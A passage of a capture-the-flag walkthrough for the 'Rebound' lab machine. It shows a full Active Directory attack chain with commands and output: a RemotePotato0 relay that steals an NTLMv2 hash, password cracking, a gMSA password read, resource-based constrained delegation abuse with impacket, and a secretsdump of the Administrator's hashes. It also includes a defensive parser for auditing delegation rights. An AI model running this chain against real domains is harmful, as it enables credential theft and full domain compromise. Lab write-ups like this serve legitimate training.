└─$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999

PS C:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2 -x 10.10.16.17 -p 9999 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (nul
l) to your victim machine on port 9999
[*] Example Network redirector:
        sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!

NTLMv2 Client   : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash     : tbrady::rebound:25cb25d078aa7cda:5d015a1e05ab333b0fc68d64bd26e5c7:01010000000000004c7bf203dc4bda0194875567cf8b3e9e0000000002000e00720
0650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e
0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008004c7bf203dc4bda0106000400060000000800300030000000000000000100000000200
000dec4cf9ef2d2a48c6c2af0bea86ea62183c13f07d827c4a1ebcfecd25e1a2f800a00100000000000000000000000000000000000090000000000000000000000



```

Cracking it with rockyou, we get the password `543BOMBOMBUNmanda`.

Looking back at bloodhound, we see that user `tbrady` has `ReadGMSAPassword` over `DELEGATOR$`.

<figure><img src="https://3153414035-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FR4a0fV7sSqa7aeUItg65%2Fuploads%2FXpvgeB8f006kyb5w18ag%2Fimage.png?alt=media&#x26;token=bbc148d5-31cf-4314-a462-c7bf00e2aba8" alt=""><figcaption></figcaption></figure>

This means we can actually [read `DELEGATOR$`'s hash via the `msDS-ManagedPassword` attribute](https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword).

```bash
┌──(kali㉿kali)-[~/…/CTF/Boxes/Rebound/gMSADumper]
└─$ bloodyAD -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword

distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc
msDS-ManagedPassword.B64ENCODED: lYA9ZPQxWkDehiHAljsucRRnh5N0HqwjJlbAqxWzhzsH3SGikzaR6F+rMpbBQqpDZBkktx2va1e+xSr+6a1jZrAupT3pvoKoV+Uja9ag0U4iavTkEtZKylKCStup68owRI9pkKsXzn+Dcz8K6fs80d2AHPNE6EWaLMakVbu7l49PqYQ8bltyjO71cEoDH7UcnJbqNwoXksbsFwMWK/Q0pL3TLQ2Ems8Ex2ng+ao9fYEPd79THKR13LwkwowzOYXF3THskJPmfUcSnibo5uvqnZXcjLczpsJSixShdooHHgjrxOweFu8GAGSfdS/nNBou1mqcq2RFQ4sDA/bhFuqJ6Q==

```

The name of the account suggests something involving delegation. To enumerate the delegation properties of the `DELEGATOR$` account, we can use [PowerView's `Get-NetComputer` and filter the properties](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation).

```powershell
PS C:\Users\winrm_svc\Documents> Get-NetComputer delegator | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
http/dc01.rebound.htb 
```

We see that `DELEGATOR$` has the `msds-allowedtodelegateto` property set to the service `http/dc01.rebound.htb`, i.e. it is configured for constrained delegation to that service.

However, from our BloodHound output, the `Administrator` user cannot be delegated.

<figure><img src="https://3153414035-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FR4a0fV7sSqa7aeUItg65%2Fuploads%2F6LvytFIk5uTJhIZFSip1%2Fimage.png?alt=media&#x26;token=83508df7-c6f0-4cf0-b715-ab989f0356c5" alt=""><figcaption></figcaption></figure>

With reference to [this](https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained), RBCD (Resource-based Constrained Delegation) can be used to bypass this. To perform this attack, we need two things, which we already have:

1. An account with an SPN: the `ldap_monitor` user fits the requirement.
2. An account able to edit the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of the target object, OR
   1. [our own machine account, `DELEGATOR$`, since machine accounts are allowed to edit their own `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute](https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd).

Using impacket's `rbcd`, we can exploit this by appending `ldap_monitor` to the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of `DELEGATOR$`.

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-rbcd  'rebound.htb/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)
[*] ldap_monitor can already impersonate users on delegator$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)
```
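To audit which principals hold this right across computer objects, a defender has to read the attribute's binary security descriptor rather than rely on a tool's summary. The following is an added example (not the write-up's or impacket's code) that parses it; the sample descriptor is constructed in the script using the `ldap_monitor` SID from the output above, and the 0xf01ff full-control mask in the ACE is an assumption.

```python
"""Parse msDS-AllowedToActOnBehalfOfOtherIdentity and list who may act on
behalf of other identities (resource-based constrained delegation).

Added example, not code from the write-up or from impacket. It assumes the
attribute's raw bytes are available (e.g. from an LDAP search of each computer
object); the descriptor below is constructed in this file so it runs offline.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF          # mask assumed for the ACE in the constructed sample
BUILTIN_ADMINS = "S-1-5-32-544"    # owner/group used for the constructed descriptor


def sid_to_bytes(sid):
    """Serialise 'S-1-5-21-...' into the binary SID layout."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("bad SID string: %s" % sid)
    authority, subs = int(parts[2]), [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf, off):
    """Return (sid_string, byte_length) for the SID starting at buf[off]."""
    rev, count = struct.unpack_from("<BB", buf, off)
    if rev != 1 or off + 8 + 4 * count > len(buf):
        raise ValueError("malformed SID at offset %d" % off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_allowed_to_act(sids):
    """Constructed sample: a self-relative SD whose DACL allows each SID."""
    aces = b""
    for sid in sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    off_dacl = 20                                   # right after the 20-byte header
    off_owner = off_dacl + len(acl)
    off_group = off_owner + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)
    return header + acl + owner + owner


def parse_allowed_to_act(sd):
    """Return [(sid, mask)] for every plain ACCESS_ALLOWED ACE in the DACL."""
    if len(sd) < 20:
        raise ValueError("descriptor too short")
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative security descriptor")
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []                                   # no DACL: nobody may act on behalf
    if off_dacl + 8 > len(sd):
        raise ValueError("DACL offset outside descriptor")
    _, _, acl_size, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    end, off, allowed = off_dacl + acl_size, off_dacl + 8, []
    if end > len(sd):
        raise ValueError("DACL size outside descriptor")
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        if ace_size < 8 or off + ace_size > end:
            raise ValueError("malformed ACE at offset %d" % off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:     # deny and object-specific ACEs are skipped
            allowed.append((sid_from_bytes(sd, off + 8)[0], mask))
        off += ace_size
    return allowed


# Constructed to match the state the rbcd output above reports: ldap_monitor
# (SID from that output) is allowed to act on behalf of others on delegator$.
LDAP_MONITOR_SID = "S-1-5-21-4078382237-1492182817-2568127209-7681"
SAMPLE_SD = build_allowed_to_act([LDAP_MONITOR_SID])

if __name__ == "__main__":
    for sid, mask in parse_allowed_to_act(SAMPLE_SD):
        print("allowed to act on behalf of other identity: %s (mask 0x%x)" % (sid, mask))
```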

We can now obtain a service ticket as `ldap_monitor`, impersonating `dc01$`, through the S4U2self and S4U2proxy operations.

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-getST -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Impersonating dc01$
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache
```

Once the ticket is obtained, it can be used in an S4U2proxy request made by `DELEGATOR$`, on behalf of the impersonated user, to obtain access to one of the services `DELEGATOR$` can delegate to (here `http/dc01.rebound.htb`).

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-getST -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01$.ccache" "rebound.htb/delegator$" -hashes aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating dc01$
[*] 	Using additional ticket dc01$.ccache instead of S4U2Self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache

```

Finally, using that ticket, we can get the Administrator hash via secretsdump.

```bash
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-secretsdump  -k dc01.rebound.htb -just-dc-user administrator -dc-ip 10.10.11.231 -debug
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/kali/.pyenv/versions/3.9.16/lib/python3.9/site-packages/impacket
[+] Using Kerberos Cache: dc01$.ccache
[+] Domain retrieved from CCache: rebound.htb
[+] SPN CIFS/DC01.REBOUND.HTB@REBOUND.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for HTTP/DC01.REBOUND.HTB@REBOUND.HTB
[+] Using TGS from cache
[+] Changing sname from http/dc01.rebound.htb@REBOUND.HTB to CIFS/DC01.REBOUND.HTB@REBOUND.HTB and hoping for the best
[+] Username retrieved from CCache: dc01$
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for administrator 
[+] Calling DRSGetNCChanges for {37857665-6e2e-4f12-9976-5c9babcd8282} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=rebound,DC=htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up... 
                   
```
